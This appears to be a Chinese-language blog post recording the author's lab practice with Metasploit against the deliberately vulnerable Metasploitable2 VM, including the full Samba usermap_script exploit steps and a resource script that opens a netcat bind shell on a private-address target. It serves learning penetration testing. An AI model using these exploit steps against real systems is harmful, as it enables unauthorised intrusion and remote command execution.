最近想找一個滲透測試的項目做,因此想學(xué)習(xí)一下metasploit的使用。
metasploit是一個強(qiáng)大的滲透測試工具,受到廣大安全愛好者的喜歡。
接下來,我將記錄下--我根據(jù)<<Metasploit滲透測試魔鬼訓(xùn)練營>>這本書,學(xué)習(xí)和使用metasploit進(jìn)行滲透測試的過程。
對metasploitable2滲透測試
1.先去官網(wǎng)下載metasploitable2鏡像,將其部署在vmware虛擬機(jī)上面,并啟動。默認(rèn)的登錄賬戶和密碼都是msfadmin
2.啟動kali虛擬機(jī),在終端下輸入msfconsole就可以啟動msf終端了
3.使用samba漏洞對metasploitable2的測試流程:
啟動&查找(search) Samba漏洞的exploit
Paste_Image.png
use exploit& show payloads
Paste_Image.png
set payload & show options & set RHOST
im
最后輸入exploit就會執(zhí)行之前設(shè)置好的exploit,之后利用成功之后會顯示生成一個shell,就可以執(zhí)行命令了
(注:跟一般的終端不一樣,沒有前綴,想看是否利用成功,可以輸入命令試試看是否返回結(jié)果,我輸入的ls -l)
Paste_Image.png
tips:
1.輸入umane -a可以查看機(jī)器的系統(tǒng)信息。
那么,怎么實現(xiàn)一個自動化的腳本來利用msf去滲透呢?可以這么做
- 先查看一些msfconsole的幫助命令:
Paste_Image.png
- 發(fā)現(xiàn)可以用msfconsole -r file來執(zhí)行一個腳本,因此先創(chuàng)建一個文件hello.msf,內(nèi)容為
use multi/samba/usermap_script
set payload cmd/unix/bind_netcat
set RHOST 192.168.150.132
exploit
- 然后輸入
msfconsole -r hello.msf
,執(zhí)行成功后如下圖:
Paste_Image.png
Paste_Image.png